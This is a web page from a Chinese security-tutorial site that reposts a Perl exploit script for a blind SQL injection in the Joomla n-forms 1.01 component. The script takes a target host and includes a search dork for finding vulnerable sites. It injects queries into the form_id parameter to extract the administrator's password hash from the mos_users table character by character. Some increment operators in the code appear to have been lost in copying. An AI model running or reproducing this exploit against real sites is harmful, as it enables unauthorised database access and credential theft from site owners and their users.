• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > Joomla Component n-forms 1.01 Blind SQL Injection Exploit

Joomla Component n-forms 1.01 Blind SQL Injection Exploit

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了Joomla Component n-forms 1.01 Blind SQL Injection Exploit ,其中包含joomla,joomla模板,joomla官网,joomla教程,joomla下载等知识点,遇到此问题的同学们可以参考下
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " ################################################################\n";
print " # Mambot Component n-forms Blind SQL Injection Exploit #\n";
print " # Author:The Moorish :D #\n";
print " # Greetz:Team-dz,His0k4,x.CJP.x,Kader11000,c02,piRAte DIgitAL#\n";
print " # sites:www.h4cnc.com ,www.dz-secure.com #\n";
print " # Dork: inurl:com_n-forms #\n";
print " # Usage: perl forms.pl host path <options> #\n";
print " # Example: perl forms.pl www.host.com /path/ -f 10 #\n";
print " # #\n";
print " # Options: #\n";
print " # -s Valid form id #\n";
print " # Note: #\n";
print " # You can change the match string if you need that #\n";
print " ################################################################\n";
exit;
}

my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $fid = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "f=i");
print "[~] Exploiting...\n";
if($options{"u"})
{
$userid = $options{"u"};
}
if($options{"f"})
{
$fid = $options{"f"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i )
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $fid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h ;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $fid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h ;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $fid = shift;
my $i = shift;
my $h = shift;

my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_n-forms&form_id=".$fid." and ascii(SUBSTRING((SELECT password FROM mos_users LIMIT 0,1 ),".$i.",1))=".$h."";

if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}

my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "nfields";

if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
</div>

您可能想查找下面的文章:

  • Joomla Component DT Register Remote SQL injection Vulnerability
  • Joomla Component n-forms 1.01 Blind SQL Injection Exploit
  • Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln
  • Joomla Component EZ Store Remote Blind SQL Injection Exploit

相关文章

  • CodeDB (list.php lang) Local File Inclusion Vulnerability
  • IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit
  • Comdev Web Blogger
  • Sagem Routers F@ST Remote CSRF Exploit (dhcp hostname attack)
  • Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit
  • IceBB
  • Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow Exploit (c)
  • WinRemotePC Full Lite 2008 r.2server Denial of Service Exploit
  • Joomla Component EZ Store Remote Blind SQL Injection Exploit
  • BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit
    • Cisco IOS 12.3(18) FTP Server Remote Exploit (attached to gdb)
    • Maian Search
    • ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities
    • BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution
    • Wysi Wiki Wyg 1.0 (index.php c) Local File Inclusion Vulnerability
    • Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit
    • Maian Recipe
    • Maian Events 2.0 Insecure Cookie Handling Vulnerability
    • Rianxosencabos CMS 0.9 Remote Add Admin Exploit

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有